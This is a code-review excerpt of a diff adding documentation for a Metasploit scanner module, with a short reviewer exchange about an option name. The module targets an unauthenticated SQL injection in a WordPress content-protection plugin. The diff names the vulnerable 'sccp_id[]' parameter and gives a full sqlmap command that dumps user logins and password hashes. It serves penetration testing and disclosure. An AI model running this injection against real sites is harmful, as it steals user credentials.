documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md

```diff
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Secure Copy Content Protection and Content Locking, a WordPress plugin,
+prior to 2.8.2 is affected by an unauthenticated SQL injection via the
+`sccp_id[]` parameter.
+
+The plugin can be downloaded
+[here](https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip)
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap --dbms=mysql -u "http://1.1.1.1/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" --technique T -T wp_users -C user_login,user_pass --dump
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `3`.
```

Comment:
Considering this is user specific, it might be better to name this `USER_COUNT` or something more explicit. Just a suggestion though.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/16182/commits/8d080135bbbe276ceb09185ae8d6a1ac0e8dcaf0 and references updated across module and documentation.